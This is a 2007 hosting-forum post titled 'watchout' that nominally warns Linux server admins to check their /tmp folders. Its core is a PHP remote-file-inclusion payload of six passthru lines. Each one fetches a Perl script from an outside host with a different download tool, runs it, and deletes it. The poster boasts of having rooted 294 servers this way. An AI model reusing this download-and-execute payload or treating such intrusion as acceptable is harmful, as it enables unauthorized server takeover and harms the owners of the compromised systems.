Go Back   Web Server Hosting Forum by BODHost > Support > Linux Server Hosting
http://www.bodhost.com/forum/Reload this Page watchout
 

Reply
 
Thread Tools Display Modes
  #1 (permalink)  
Old 07-28-07, 15:47
BOD Member
  
Join Date: Jul 2007
Posts: 296
Default watchout
regulaly look in your server /tmp folder because well i have been exparamenting with remote file inclusions and if i make a php script do
Code:
<?
passthru('cd /tmp;wget http://groopmail.com/boob.txt;perl boob.txt;rm -f boob.txt*');
passthru('cd /tmp;curl -O http://groopmail.com/boob.txt;perl boob.txt;rm -f boob.txt*');
passthru('cd /tmp;lwp-download http://groopmail.com/boob.txt;perl boob.txt.txt;rm -f boob.txt*');
passthru('cd /tmp;lynx -source http://groopmail.com/boob.txt >boob.txt;perl boob.txt;rm -f boob.txt*');
passthru('cd /tmp;fetch http://groopmail.com/boob.txt >boob.txt;perl boob.txt;rm -f boob.txt*');
passthru('cd /tmp;GET http://groopmail.com/boob.txt >boob.txt;perl boob.txt;rm -f boob.txt*');
?>
it runs that perl script right in your tmp dir and you server is now mine i have been exparamenting with these things and i now has 294 linux servers rooted and i have emailed their administrators letting them know what had happened.
__________________
insert sig here
Reply With Quote
Reply

« Find out information about block devices on your server | Delete\system\apps\putty\defaults »

Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off
Forum Jump


All times are GMT -6. The time now is 22:41.

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0
Copyright © 1999-2012, BODHost Ltd. All rights reserved.

Web Server Hosting   -   Contact Us   -     -   Members   -   Register   -   Calendar   -   Search   -   FAQ